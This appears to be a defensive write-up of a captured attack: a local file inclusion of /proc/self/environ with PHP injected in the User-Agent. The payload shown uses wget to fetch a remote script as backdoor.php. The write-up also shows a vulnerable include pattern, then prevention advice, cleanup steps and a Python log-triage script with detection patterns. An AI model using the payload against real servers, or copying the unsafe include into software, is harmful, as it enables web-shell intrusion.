Event Details
Date
21 June 2010
POST Values
file: ../../proc/self/environ
SERVER Values
HTTP_USER_AGENT:
<? exec("wget http://[remotescript].txt -O backdoor.php"); ?>
This is a simplified version of what was captured in the user agent field.
What the hacker was hoping for
What we have here is a local file inclusion attack coupled with injected PHP code.
The visitor is hoping that my code that handles file inclusion is written something like this:
<?php
// Include file requested
include($_GET['file']);
?>
Thus the file that will be included would be:
/var/www/../../proc/self/environ (which equates to /proc/self/environ)
The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, and /proc/self/ refers to the thread currently being run. Apache exposes various values in /proc/self/environ (the environment variables), such as the visitor's IP address, user agent, the script called and other values like this:
DOCUMENT_ROOT=/var/www
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=
HTTP_HOST=www.example.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
PATH=/bin:/usr/bin
QUERY_STRING=
REMOTE_ADDR=x.x.x.x
REMOTE_PORT=xxxx
REQUEST_METHOD=GET
REQUEST_URI=/index.php
SCRIPT_FILENAME=/var/www/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=x.x.x.x
SERVER_ADMIN=webmaster@example.com
SERVER_NAME=www.example.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.1
SERVER_SIGNATURE=Apache/2.0 (Unix)
However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT) containing PHP, that value is included along with the rest of the file and executed as PHP code. The PHP code would then execute a shell command to retrieve a remote script, download it to the server and place it in the website folder:
<?php
// Fetch the remote script and save it as backdoor.php in the web root
exec("wget http://[remotescript].txt -O backdoor.php");
?>
Now the hacker can visit his page and run any commands he wants on your webserver:
http://www.example.com/backdoor.php
How to prevent this
- Sanitize your inputs
- Ensure that directory traversal is disabled/checked for
- Work with an allowed list of files:
$allowed_files = array('file1.php', 'file2.php');
// strict comparison; array_search() returns false (not NULL) when the value is not found
$allowed_index = array_search($_GET['file'], $allowed_files, true);
if ($allowed_index !== false)
{
include $allowed_files[$allowed_index];
}
- Don't allow visitors to specify files by name; map a key to each file instead:
$allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
if (isset($_GET['file']) && is_string($_GET['file']) && !empty($allowed_files[$_GET['file']]))
{
include $allowed_files[$_GET['file']];
}
Threat Level
High
Course of Action
If this has happened to you, do the following:
- Take the server offline (if possible)
- Check active process list for unknown scripts and kill them
- Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
- Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
- Remove backdoor scripts
- Monitor your logs. The hacker will probably return and attempt to reinfect your server.
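The log check above (find the attacker's IP addresses, then every script those addresses touched) as an added example, not part of the original post. It assumes Apache's "combined" log format; the log lines, IP addresses and paths are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>.*)"$')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
ENVIRON_RE = re.compile(r'/proc/self/environ', re.I)
PHP_TAG_RE = re.compile(r'<\?(php)?[\s(]', re.I)   # "<? exec(" or "<?php ..." in the User-Agent

def classify(line):
    """Return (ip, script, reasons) for a suspicious request, or None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice: the traversal is often URL-encoded (%2e%2e%2f) or double-encoded (%252e).
    path = unquote(unquote(m['path']))
    reasons = []
    if TRAVERSAL_RE.search(path):
        reasons.append('directory traversal in request')
    if ENVIRON_RE.search(path):
        reasons.append('/proc/self/environ requested')
    # POST bodies are not logged, but the User-Agent is, so the PHP payload still shows up.
    if PHP_TAG_RE.search(unquote(m['ua'])):
        reasons.append('PHP code in User-Agent')
    if not reasons:
        return None
    return m['ip'], path.split('?', 1)[0], reasons

def triage(lines):
    """Flagged IPs with their reasons, plus every script those IPs touched (backdoor candidates)."""
    report = defaultdict(lambda: {'reasons': set(), 'scripts': set()})
    for line in lines:
        hit = classify(line)
        if hit:
            report[hit[0]]['reasons'].update(hit[2])
    for line in lines:                     # second pass: all requests from the flagged IPs
        m = LOG_RE.match(line)
        if m and m['ip'] in report:
            report[m['ip']]['scripts'].add(unquote(m['path']).split('?', 1)[0])
    return dict(report)

# Constructed sample lines; the IPs come from documentation ranges and the paths are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jun/2010:10:12:01 +0000] "POST /index.php HTTP/1.1" 200 512 "-" "<? exec(\\"wget http://[remotescript].txt -O backdoor.php\\"); ?>"',
    '203.0.113.7 - - [21/Jun/2010:10:12:05 +0000] "GET /backdoor.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Jun/2010:10:13:00 +0000] "GET /index.php?file=file1.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Jun/2010:10:14:11 +0000] "GET /index.php?file=%2e%2e%2f%2e%2e%2fproc/self/environ HTTP/1.1" 200 301 "-" "Mozilla/5.0"',
]
```

Running `triage(SAMPLE_LOG)` flags only 203.0.113.7 and lists /backdoor.php among its scripts even though that request on its own looks harmless, which is the point of the second pass.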